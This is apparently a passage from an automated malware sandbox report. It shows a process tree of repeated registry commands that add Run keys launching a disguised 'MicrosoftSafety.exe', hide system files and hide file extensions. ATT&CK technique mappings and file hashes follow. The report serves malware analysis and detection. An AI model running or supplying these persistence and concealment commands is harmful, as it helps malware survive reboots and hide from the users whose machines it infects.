    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3516
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4944
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3096
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2452
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1648
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1688
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2180
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3152
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3644
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4640
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4984
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2740
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4116
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4240
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:5020
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4104
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3648
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1284
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:3564
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2480
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4016
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3788
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4904
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4120
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4868
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:5000
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3700
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3736
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:660
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3836
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4056
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:3532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2524
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1260
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2192
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2248
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2356
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1124
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:472
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4176
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1132
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4316
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2184
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3368
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3544
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1060
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1208
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1404
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:2388
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4216
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4980
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:856

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1512

Network

MITRE ATT&CK Enterprise v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program File\Microsoft\MicrosoftSafety.exe

Filesize
108KB

MD5
70aa65000971a15507d18d4ab0b3e6ef

SHA1
7cd24fe30c3a160a41a96a29fdd01e21f66d94bb

SHA256
ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b

SHA512
f12c78cf15784b1299e8666f1b59f384c31908e35a88704341fb0e11e4083f0e376ce062a2398ca0a5ced9664cb26d85e0a835651d37cc50ed03958d70060f34

Download Submit
C:\autorun.inf

Filesize
87B

MD5
a58e87ffeec377bdfe74aa489e222618

SHA1
ce4755bf320611f95b2e6fd8128a95d22b2680da

SHA256
fd5ee8d0b5bfe9e3d8e7088253d80602c554d62d2ee69ad9270722c251d6eff0

SHA512
1e5cf2c04ecc7e16dd26020c73a8a47059cce08f8224632621818d62dd00f928a1829e385db4cfbda1dc438dcc1187903556dd483d5786ebe6cfad915a459c66

Download Submit
memory/5112-134-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download
memory/5112-201-0x0000000000400000-0x000000000042D000-memory.dmp

Filesize
180KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads